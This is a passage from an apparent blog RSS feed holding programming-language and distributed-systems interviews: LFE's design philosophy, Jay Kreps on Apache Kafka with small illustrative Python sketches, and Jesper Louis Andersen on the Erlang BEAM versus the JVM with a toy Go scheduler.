&lt;p&gt;&lt;strong&gt;What do you think about the&lt;&#x2F;strong&gt; &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.sbcl.org&#x2F;manual&#x2F;#Handling-of-Types&quot;&gt;&lt;strong&gt;Steel Bank Common Lisp type system&lt;&#x2F;strong&gt;&lt;&#x2F;a&gt;&lt;strong&gt;,&lt;&#x2F;strong&gt; &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;docs.racket-lang.org&#x2F;ts-guide&#x2F;index.html&quot;&gt;&lt;strong&gt;Typed Racket&lt;&#x2F;strong&gt;&lt;&#x2F;a&gt;&lt;strong&gt;,&lt;&#x2F;strong&gt; &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;clojure&#x2F;core.typed&quot;&gt;&lt;strong&gt;Clojure’s core.typed&lt;&#x2F;strong&gt;&lt;&#x2F;a&gt; &lt;strong&gt;and&lt;&#x2F;strong&gt; &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.shenlanguage.org&#x2F;learn-shen&#x2F;types&#x2F;types.html&quot;&gt;&lt;strong&gt;Shen types&lt;&#x2F;strong&gt;&lt;&#x2F;a&gt;&lt;strong&gt;?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;I have never tried these so I can’t say. Generally I am very dynamically typed. :-)&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What is the roadmap for LFE v1.0?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;So far the roadmap has been a little “I just want to add this one last feature and then I’ll release 1.0”. Anyway, my plan now is that when the new macro handling works and is properly integrated then the system will feel well rounded and I will release 1.0.&lt;&#x2F;p&gt;
&lt;hr &#x2F;&gt;
&lt;h4 id=&quot;did-you-like-it-follow-me-on-twitter-unbalancedparen&quot;&gt;Did you like it? &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;twitter.com&#x2F;unbalancedparen&quot;&gt;Follow me on Twitter — @unbalancedparen&lt;&#x2F;a&gt;&lt;&#x2F;h4&gt;
&lt;p&gt;Oh and I recommend that you read this email from Robert about LFE titled &lt;em&gt;“A bit of philosophy and some design principles”&lt;&#x2F;em&gt;:&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;There was a bit of discussion on the IRC about the CL module and where LFE gets its impulses from, that it doesn’t try to stand on its feet. There are things in it from scheme and CL but most of it is based on Erlang and the features it provides and the type of systems you build using it.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;The base of LFE rests directly on what the underlying Erlang VM provides and this determines what LFE can do and how it works. It is based on language features like modules, pattern matching, immutable data and how functions work. This is what defines LFE. I don’t think that LFE tries as hard as Elixir to hide this background.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;This, for example, is why LFE is a lisp-2 not a lisp-1 as it is a better fit for how Erlang handles functions. On top of this there is a set of convenience macros which were originally more scheme inspired but became more CL inspired when LFE became a lisp-2. They are just a better fit. Of course this doesn’t make LFE a scheme or a CL as there are many things in both scheme and CL which LFE can’t do because of the underlying Erlang VM like mutable data and the handling of nil&#x2F;() and symbols with values, plists and function bindings [*].&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;An alternative would have been more inspired by Clojure, which shares some properties with Erlang. However they are fundamentally different in many ways, so it would mainly have been using Clojure’s naming conventions. Also Clojure’s concurrency model is very different from Erlang&#x2F;LFE, so its way of building systems is also very different. You get the feeling, at least I do, that it is based on a central thread of execution where you can run things in parallel, but there is this central thread. This is very un-Erlangy, as Erlang&#x2F;LFE systems typically don’t have a central thread.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;This gets us, finally, to the CL module. It is just a library containing many of the standard CL library functions which gives you the possibility of writing in a CL style. Not everything can be included, for example the nXXXX functions which mutate data, and some features don’t mesh well with Erlang&#x2F;LFE. For example equating nil&#x2F;() and predicates which in Erlang&#x2F;LFE return true&#x2F;false while in CL are truthy and return nil&#x2F;() and anything else [**]. It is in no way a fundamental part of LFE and is just an add-on. If anyone feels inclined to do a similar module for clojure then I will definitely consider including it. Again it would just be an add-on. These could easily be included in the base release.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;Packages like flavors, which I did because they are interesting and I think fun, should probably not be part of the base. This would also apply to things like LFE CLOS (if anyone decided to do it) and LFE clojure-like protocols. They are interesting and useful in themselves but not things I would consider part of the LFE base. A set of these should probably be kept in a standard place to make them easily accessible for everyone. I would like to keep the base relatively simple, clean and “basic”, a “lean, mean, fighting machine” if you will. It is all too easy to add things, even sensible and useful things, and end up with a bloated mess. I really want to avoid this, hence keeping the base simple and clean.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
</description>
      </item>
      <item>
          <title>Interview with Jay Kreps about Apache Kafka</title>
          <pubDate>Mon, 22 Feb 2016 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/interview-with-jay-kreps-about-apache-kafka/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/interview-with-jay-kreps-about-apache-kafka/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/interview-with-jay-kreps-about-apache-kafka/">&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-lRRJqrarJFi5TPtnBm_8hA.jpeg&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;This time we interviewed &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;twitter.com&#x2F;jaykreps&quot;&gt;Jay Kreps&lt;&#x2F;a&gt;, one of the creators of Apache Kafka. Kafka is an open source messaging system with a few design choices that make it particularly useful for high throughput and low latency scenarios.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;em&gt;“This experience led me to focus on building Kafka to combine what we had seen in messaging systems with the log concept popular in databases and distributed system internals. We wanted something to act as a central pipeline first for all activity data, and eventually for many other uses, including data deployment out of Hadoop, monitoring data, etc.” — Jay Kreps&lt;&#x2F;em&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Kafka is built around the concept of a distributed database commit log. If you have no idea what that is, then I highly recommend that after you finish reading the interview you check the links I have pasted at the end. I learnt a lot by reading them.&lt;&#x2F;p&gt;
&lt;p&gt;In the following weeks I am going to publish an interview with &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;twitter.com&#x2F;martinkl&quot;&gt;Martin Kleppmann&lt;&#x2F;a&gt;, one of the authors of Samza, about his book Data Intensive Applications and realtime stream processing systems vs batch processing systems.&lt;&#x2F;p&gt;
&lt;hr &#x2F;&gt;
&lt;p&gt;&lt;strong&gt;What problem does Kafka solve?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Kafka is a distributed storage system for data streams. It allows you to publish streams of data and subscribe to them. It is built around the concept of a persistent log that is appended to — publishers of data append to this log and consumers subscribe to changes. Perhaps most importantly, it scales really well so it can function as a central hub for these data streams even in a company with a lot of data like LinkedIn or Netflix or Uber.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Why were RabbitMQ, ActiveMQ and other similar open source projects not useful to solve this problem?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;There are a few things that are different about Kafka:&lt;&#x2F;p&gt;
&lt;ol&gt;
&lt;li&gt;It is built from the ground up as a modern distributed system. It handles replication, fault-tolerance, and partitioning. You think about Kafka as a cluster, not a collection of individual brokers. This impacts everything from how you manage it to how programs behave.&lt;&#x2F;li&gt;
&lt;li&gt;Kafka does a good job of persistence. Data in Kafka is always persisted and can be re-read.&lt;&#x2F;li&gt;
&lt;li&gt;Kafka is faster than traditional messaging systems and hence more suitable for really large volume data streams, such as would come from logging use cases or massive streams of sensor data.&lt;&#x2F;li&gt;
&lt;li&gt;Kafka was designed to support distributed stream processing as a layer on top of its core primitives. This is why Kafka is so commonly used with things like Spark Streaming or Storm.&lt;&#x2F;li&gt;
&lt;&#x2F;ol&gt;
&lt;p&gt;&lt;strong&gt;In what type of structure do you persist messages and in which format?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;A message or record in Kafka is just a key-value pair, where the key and value are each a string of bytes.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;0-4N-FW2mHbx6AsraV.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Kafka provides the abstraction of a “topic” which is split into one or more partitions (usually many) and spread over a cluster of nodes. A topic is a kind of feed of records. Applications publish records into a topic, and the record’s key determines the partition within that topic that the record goes to. Each partition is replicated on multiple machines for fault-tolerance.&lt;&#x2F;p&gt;
&lt;p&gt;The core abstraction Kafka provides (as well as the data structure it uses in its implementation) is a write ahead log. This log is just an ordered sequence of the records written to the cluster that is persisted to disk. Each record is assigned a sequential number called an offset. This offset acts as a position in the log.&lt;&#x2F;p&gt;
&lt;p&gt;An application consuming that partition can be thought of as having a position in the log designated by that offset, which means it has consumed all the records earlier and none of the records after. The application controls that position and can continue to read forward or go back in time to re-read.&lt;&#x2F;p&gt;
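&lt;p&gt;As a rough sketch of the abstraction described above (all names here are illustrative, not Kafka’s actual code or client API), a partition log with consumer-controlled offsets can be modeled in a few lines of Python:&lt;&#x2F;p&gt;

```python
# Toy model of a Kafka-style partition log: an ordered, append-only
# sequence of key-value records, each identified by a sequential offset.
# All names are illustrative, not Kafka's real API.

class PartitionLog:
    def __init__(self):
        self.records = []  # append-only; a record's index is its offset

    def append(self, key, value):
        """Append a record and return the offset it was assigned."""
        offset = len(self.records)
        self.records.append((key, value))
        return offset

    def read_from(self, offset, max_records=10):
        """Read forward from a consumer-supplied offset."""
        return self.records[offset:offset + max_records]

log = PartitionLog()
log.append(b"user-1", b"clicked")
log.append(b"user-2", b"viewed")

# The consumer, not the broker, tracks its position; rewinding to
# re-read old records is just resetting this integer.
position = 0
batch = log.read_from(position)
position += len(batch)
```

&lt;p&gt;The point of the sketch is the division of responsibility: the log only assigns offsets and serves reads, while each consumer owns its position and can move it forward or backward at will.&lt;&#x2F;p&gt;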
&lt;p&gt;&lt;strong&gt;How does Kafka manage to easily handle many tens of thousands of messages per second if it persists them to disk instead of keeping them in memory?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Careful design! Our observation was that there was no fundamental reason that the log abstraction we wanted couldn’t be as fast as the underlying filesystem at linear writes, which means anything from hundreds of MB&#x2F;sec on spinning disks to GBs&#x2F;sec on SSDs. To make this happen Kafka does a good job of batching together lots of small writes into big linear appends to files. This batching happens in the producer, in the replication protocol, in the consumer, and in the operating system itself.&lt;&#x2F;p&gt;
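&lt;p&gt;The batching idea can be illustrated with a toy Python writer (hypothetical names; an in-memory buffer stands in for the log file):&lt;&#x2F;p&gt;

```python
import io

# Toy illustration of write batching: many small logical writes are
# buffered in memory and reach the underlying sink as a few large
# linear appends, instead of one physical write per record.

class BatchingWriter:
    def __init__(self, sink, batch_size=3):
        self.sink = sink      # file-like object, only ever appended to
        self.buffer = []
        self.batch_size = batch_size
        self.flushes = 0      # number of physical writes issued

    def write(self, record):
        self.buffer.append(record)
        if len(self.buffer) >= self.batch_size:
            self.flush()

    def flush(self):
        if self.buffer:
            self.sink.write(b"".join(self.buffer))  # one linear append
            self.buffer.clear()
            self.flushes += 1

sink = io.BytesIO()
writer = BatchingWriter(sink)
for i in range(6):
    writer.write(b"rec%d;" % i)
# Six logical writes became two physical appends to the sink.
```

&lt;p&gt;The same trade-off appears at every layer the answer above mentions: amortizing fixed per-write costs over many records is what lets a persistent log keep up with the raw filesystem.&lt;&#x2F;p&gt;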
&lt;p&gt;I do think the domain of infrastructure engineering is different in this way. Application developers are warned against the dangers of premature optimization, but for infrastructure I think you need to start thinking about performance in the design phase. The reason it is so different is that the fundamental constraints are well known ahead of time and usually system designs are not very flexible, so if you ignore performance initially it is generally very hard to get it back later by optimizing within your existing design.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What guarantees does Kafka provide? In which cases can messages be lost?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Kafka guarantees that writes are replicated across N instances in the same order (where N is a replication factor you choose) and that your write won’t be lost as long as at least one of these instances remains alive.&lt;&#x2F;p&gt;
&lt;p&gt;In combination with the way consumers control their own offset this translates to an “at-least-once” delivery.&lt;&#x2F;p&gt;
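&lt;p&gt;A small Python sketch (illustrative, not client code) shows why consumer-controlled offsets yield at-least-once delivery: if the consumer crashes after processing a record but before committing its offset, the record is processed again on restart.&lt;&#x2F;p&gt;

```python
# Records in a partition, the last committed consumer offset, and the
# side effects produced by processing. All names are illustrative.
records = ["a", "b", "c"]
committed = 0
processed = []

def consume(crash_at=None):
    """Process records from the last committed offset, committing only
    after each record's side effect; optionally crash mid-run."""
    global committed
    offset = committed
    while offset < len(records):
        processed.append(records[offset])  # side effect first...
        offset += 1
        if crash_at is not None and offset == crash_at:
            return                         # simulated crash: no commit
        committed = offset                 # ...commit second

consume(crash_at=2)  # processes "a" and "b", but only commits "a"
consume()            # restart: re-processes "b", then "c"
# "b" was processed twice: at-least-once delivery, duplicates possible
```

&lt;p&gt;Committing in the other order (before processing) would instead give at-most-once delivery: a crash could then skip a record entirely.&lt;&#x2F;p&gt;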
&lt;p&gt;&lt;strong&gt;In&lt;&#x2F;strong&gt; &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;youtu.be&#x2F;9RMOc0SwRro&quot;&gt;&lt;strong&gt;this talk&lt;&#x2F;strong&gt;&lt;&#x2F;a&gt; &lt;strong&gt;you mentioned Kafka Streams. Could you briefly explain what it is and why it will be useful?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Kafka Streams is a stream processing layer for Kafka we’ve been working on. It’s a little different from the existing stream processing frameworks that are out there — more focused on building streaming applications and less a kind of real-time version of MapReduce.&lt;&#x2F;p&gt;
&lt;p&gt;We’ll be doing a preview release in early March (we’re really excited).&lt;&#x2F;p&gt;
&lt;p&gt;Combined with the work we did on &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.confluent.io&#x2F;blog&#x2F;announcing-kafka-connect-building-large-scale-low-latency-data-pipelines&quot;&gt;Kafka Connect&lt;&#x2F;a&gt;, we think this makes Kafka a really compelling &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.confluent.io&#x2F;blog&#x2F;stream-data-platform-1&#x2F;&quot;&gt;platform for streaming data&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What needs to be done before releasing Kafka 1.0?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;We’ll get there. We thought we needed to at least get a stable version of Connect and Streams done as they are a pretty essential part of the platform.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Why did you choose Java to implement Kafka? Did you ever consider using another programming language?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;We had a lot of experience with the JVM and knew it was possible to build reliable and fast infrastructure on top of it — and it was more convenient to work with than C or C++.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;I work as an Erlang developer and I was thrilled by your comments about concurrency and languages in&lt;&#x2F;strong&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;blog.empathybox.com&#x2F;post&#x2F;90318905473&#x2F;concurrency-is-not-a-language-thing-anymore&quot;&gt;&lt;strong&gt;“Concurrency is not a language thing anymore”&lt;&#x2F;strong&gt;&lt;&#x2F;a&gt;&lt;strong&gt;:&lt;&#x2F;strong&gt;&lt;br &#x2F;&gt;
&lt;em&gt;“In the near-real-time processing domain stream processing frameworks do a good job of providing asynchronous processing without directly thinking about concurrency at all. Again you interact with concurrency and parallelism only at the framework level, the code you write appears completely single-threaded.&lt;&#x2F;em&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;em&gt;The offline world seems to be moving in the direction of a handful of YARN frameworks for different specialized purposes. What almost all of these share is that they don’t require users to directly manage concurrency.&lt;&#x2F;em&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;em&gt;This leads me to think that putting more time into language support for single-server concurrency (software transactional memory and all that) is of limited utility. It will only help the implementors of these frameworks, not the end user.”&lt;&#x2F;em&gt;&lt;br &#x2F;&gt;
&lt;strong&gt;Apart from Erlang, some languages like Go and Clojure added a good concurrency model and semantics from the start. Don’t you think there is any area where having good concurrency baked into the language is useful for the normal developer and not only for the implementor of frameworks?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;The critique I was trying to make is sort of analogous to the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;End-to-end_principle&quot;&gt;end-to-end principle&lt;&#x2F;a&gt; for network protocols, basically you end up needing to solve the concurrency problem at a higher level anyway which makes the lower-level primitive the languages provide redundant. What I see is each language is trying to provide built-in primitives for multi-core programming. Other than Erlang I think most of these ignore the problem of distributed computing. But what has changed is that modern programming is always done in some framework that introduces a concurrency model at a higher level. Examples of these frameworks would be the whole Apple and Android stacks, numerous microservice frameworks, and things like Spark or Kafka Streams. These higher level frameworks are able to do a better job because they can make assumptions about the environment that just aren’t possible at the language level. So, for example, many of them are able to introduce a model that simultaneously solves for spreading computation over CPU cores on one machine as well as over multiple machines.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Why does Kafka depend on Zookeeper? What job does Zookeeper do for Kafka?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.confluent.io&#x2F;blog&#x2F;distributed-consensus-reloaded-apache-zookeeper-and-replication-in-kafka&quot;&gt;This article&lt;&#x2F;a&gt; gives an overview of its role in Kafka’s replication design.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Do you have any recommendations for those of us who want to start learning about distributed systems? Were there any books, papers or codebases that really helped you implement and design Kafka?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;I think a great place to start is Martin Kleppmann’s book &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;shop.oreilly.com&#x2F;product&#x2F;0636920032175.do?cmp=af-strata-books-videos-product_cj_9781491903094_%25zp&quot;&gt;Designing Data Intensive Applications&lt;&#x2F;a&gt;. I have only read parts of it, but from what I’ve seen it is the best accessible introduction to distributed systems out there. Unfortunately only 9 of 12 chapters are available, so we should all bug him to finish it!&lt;&#x2F;p&gt;
&lt;p&gt;A good textbook you &lt;em&gt;can&lt;&#x2F;em&gt; buy today is &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.amazon.com&#x2F;Introduction-Reliable-Secure-Distributed-Programming&#x2F;dp&#x2F;3642152597&quot;&gt;Introduction to Reliable and Secure Distributed Programming&lt;&#x2F;a&gt;. This book isn’t great for learning, but it is an order of magnitude better than other textbooks, which are utterly terrible. Unfortunately distributed systems research had several decades in which it wasn’t really very practical, and hence it developed a culture that seems to pride itself on its lack of connection to mainstream practice. For example, that book manages to spend on the order of a hundred pages introducing different possible communication primitives and talking about their properties without bothering to connect any of these to actual mainstream network protocols like UDP and TCP, which seems pretty silly to me.&lt;&#x2F;p&gt;
&lt;p&gt;The best thing is that these days there are hundreds of open source distributed systems available and you can learn quite a lot about the design and implementation of these.&lt;&#x2F;p&gt;
&lt;hr &#x2F;&gt;
&lt;p&gt;As I mentioned in the introduction to the interview, I highly recommend that you read the following links about Kafka, its design and uses:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;engineering.linkedin.com&#x2F;distributed-systems&#x2F;log-what-every-software-engineer-should-know-about-real-time-datas-unifying&quot;&gt;The Log: What every software engineer should know about real-time data’s unifying abstraction&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.confluent.io&#x2F;blog&#x2F;stream-data-platform-1&#x2F;&quot;&gt;Putting Apache Kafka To Use: A Practical Guide to Building a Stream Data Platform (Part 1)&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.confluent.io&#x2F;blog&#x2F;stream-data-platform-2&#x2F;&quot;&gt;Putting Apache Kafka To Use: A Practical Guide to Building a Stream Data Platform (Part 2)&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;kafka.apache.org&#x2F;documentation.html#design&quot;&gt;Apache Kafka design documentation&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;Jay also gave a few excellent talks about Kafka that explain why it was created and what are its uses:&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Interview with Jesper Louis Andersen about Erlang, Haskell, OCaml, Go, Idris, the JVM, software and…</title>
          <pubDate>Tue, 29 Dec 2015 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/interview-with-jesper-louis-andersen-about-erlang-haskell-ocaml-go-idris-the-jvm-software-and-60901251608c356716f2f92e/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/interview-with-jesper-louis-andersen-about-erlang-haskell-ocaml-go-idris-the-jvm-software-and-60901251608c356716f2f92e/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/interview-with-jesper-louis-andersen-about-erlang-haskell-ocaml-go-idris-the-jvm-software-and-60901251608c356716f2f92e/">&lt;h3 id=&quot;interview-with-jesper-louis-andersen-about-erlang-haskell-ocaml-go-idris-the-jvm-software-and-protocol-design-part-ii&quot;&gt;Interview with Jesper Louis Andersen about Erlang, Haskell, OCaml, Go, Idris, the JVM, software and protocol design — PART II&lt;&#x2F;h3&gt;
&lt;p&gt;This is part II of the interview with &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;twitter.com&#x2F;jlouis666&quot;&gt;Jesper Louis Andersen&lt;&#x2F;a&gt;. You can read &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;medium.com&#x2F;this-is-not-a-monad-tutorial&#x2F;interview-with-jesper-louis-andersen-about-erlang-haskell-ocaml-go-idris-the-jvm-software-and-b0de06440fbd#.4gidstolk&quot;&gt;part I here.&lt;&#x2F;a&gt; This part of the interview is mostly about Erlang, one of my favorite languages. If you want to learn Erlang, take a look at &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;spawnedshelter.com&#x2F;&quot;&gt;Spawned Shelter&lt;&#x2F;a&gt;, a website I made for Erlang newcomers.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-DCzEYU60hk2pO7WCJj3GoQ.jpeg&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What are the advantages of the Erlang VM over the JVM and vice versa?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;From the perspective of history, the choice of building the BEAM VM for Erlang was the correct one. Massive concurrency was less on the radar for many people, and Ericsson needed a platform which they controlled. Furthermore, the BEAM can exploit the fact that it is executing functional languages only: the GC needs no remembered set between generations, for instance.&lt;&#x2F;p&gt;
&lt;p&gt;The roll-your-own-design decision has proven to be very valuable, even though compared to the JVM, the OTP team is far smaller. My guess is that for every hour sunk into BEAM, there are at least 15–20 hours of work in the JVM. In turn, there are things which you cannot do efficiently on the BEAM. It is still (2015) bytecode-interpreted and has no JIT, which means raw execution of computationally intensive tasks is about 10–20 times slower than typical well-written Java. Projects such as Quasar&#x2F;Pulsar and Akka promise Erlang-style concurrency on the JVM, but they are recently developed, whereas the BEAM has been in production for many years.&lt;&#x2F;p&gt;
&lt;p&gt;The key differing design criteria come from the design space originating in Bjarne Däcker’s thesis: most notably the soft real-time constraints and the need for seamless hardware interaction, but also the need for running very large software systems in which feature interaction is complex. It turns out that in such a world the major problems are rarely raw execution speed, but rather how parts of the system operate as a coherent whole. Many of the problems in the design space require a different approach than sheer execution brute force, especially in a multicore world. Had fast execution been important, it would have been addressed a long time ago. But it turns out every major release of BEAM provides a far more important set of new features. There is a lot of power in having a large industrial company backing the system, as the new features tend to be operational&#x2F;industrial in nature.&lt;&#x2F;p&gt;
&lt;p&gt;The key difference in implementation is that the BEAM is built from the ground up as a resource-sharing system, much like an operating system. In an OS, two processes A and B are isolated and get a fair share of the resources. If B is badly written, this has considerably less impact on A. Suppose for instance B has bad GC productivity and allocates a lot. Then the GC of B has to run far more often and B has to pay: either in lower throughput, or in worse latency. At the same time, A will keep on running, without B having any bad impact on its operation. The BEAM isolates resources in such a way that a B application cannot directly impact an A application from a resource standpoint.&lt;&#x2F;p&gt;
&lt;p&gt;The contrast is systems where one large shared heap is used. They put both A and B on the same GC heap, hoping it is fast enough to power through. But clearly, a badly written B can affect a well-written A far more. It matters in very-large-scale development, since you cannot hope every part of the system is perfectly written.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;If the Erlang VM uses asynchronous I&#x2F;O,&lt;&#x2F;strong&gt; &lt;strong&gt;how does it manage to present a normal API to the developer? Why aren’t callbacks needed like in Node.js?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Node.js uses a cooperative scheduling algorithm as seen in old operating systems such as MacOS 9, Windows 95 running legacy 16-bit code, MS-DOS and so on. The method, in which the program explicitly yields the CPU for the next task, has a number of advantages: it is easy to adapt existing languages and systems to the method. It is highly efficient in throughput. And it allows you to “pack” lots of work into a single process.&lt;&#x2F;p&gt;
&lt;p&gt;The weakness of the cooperative model is its fragility in server settings. If one of the tasks in the task queue monopolizes the CPU, hangs or blocks, then the impact is worse throughput, higher latency, or a deadlocked server. The fragility has to be avoided in large-scale systems, so the Erlang runtime is built preemptively. The normal code is “instrumented” such that any call which may block automatically puts that process to sleep, and switches in the next one on the CPU. Furthermore, Erlang being functional, any process must loop by calling functions. An internal funcall counter measures “reductions” and once 2000 of these have been used, the process is forced off the CPU and the next one is switched in. This is entirely automatic and follows the modern idea of time-sharing in operating systems: AmigaOS, UNIX, Windows NT+, and so on.&lt;&#x2F;p&gt;
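&lt;p&gt;The reduction-counting idea can be illustrated with a toy round-robin scheduler. The following Go sketch is purely an analogy to the description above, not BEAM’s actual implementation: each “process” spends one reduction per function call and is forced off the CPU once its budget is exhausted (the budget here is tiny; BEAM’s is on the order of 2000).&lt;&#x2F;p&gt;

```go
package main

import "fmt"

// proc is a toy "process": steps counts the function calls
// (reductions) it still wants to make.
type proc struct {
	name  string
	steps int
}

const budget = 5 // BEAM uses on the order of 2000 reductions

// run is a toy round-robin scheduler: each process consumes one
// reduction per function call and is forced off the CPU once its
// budget is spent, whether or not it wants to keep running.
func run(procs []*proc) []string {
	var trace []string
	remaining := true
	for remaining {
		remaining = false
		for _, p := range procs {
			for r := 0; r < budget && p.steps > 0; r++ {
				p.steps-- // one reduction consumed
			}
			if p.steps > 0 {
				remaining = true // preempted; rescheduled next round
			}
			trace = append(trace, fmt.Sprintf("%s:%d left", p.name, p.steps))
		}
	}
	return trace
}

func main() {
	// "a" needs 12 reductions, "b" needs 3: "a" is preempted twice,
	// yet "b" gets CPU time in every round.
	fmt.Println(run([]*proc{{"a", 12}, {"b", 3}}))
}
```

&lt;p&gt;Even though “a” asks for four times more work than the budget allows, the forced yield means “b” never waits more than one time slice, which is the latency property the interview describes.&lt;&#x2F;p&gt;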
&lt;p&gt;Note that in Erlang there is &lt;em&gt;no way&lt;&#x2F;em&gt; to call blocking operations at all, since they are all handled by the runtime. This means the model is coherent and I can use any library I like without fear of it doing something bad. As an example, BEAM uses its own PCRE regex library which cooperatively yields during expensive NFA traversals. It also breaks up expensive crypto-computations, long-running GCs, and costly term serializations. It even includes a blocking monitor built in, so you can get notified if a monopolization has happened. Calls to foreign code written in C are harder, though, since you have to take its blocking behavior into account.&lt;&#x2F;p&gt;
&lt;p&gt;You can get much of the same in any other language by using an appropriate framework. However, this breeds fragmentation: library code in one framework is not usable in another framework without adaptation. And code written for no framework has to be inspected for possible blocking behavior. In turn, code is colored in different colors, and you can’t mix them.&lt;&#x2F;p&gt;
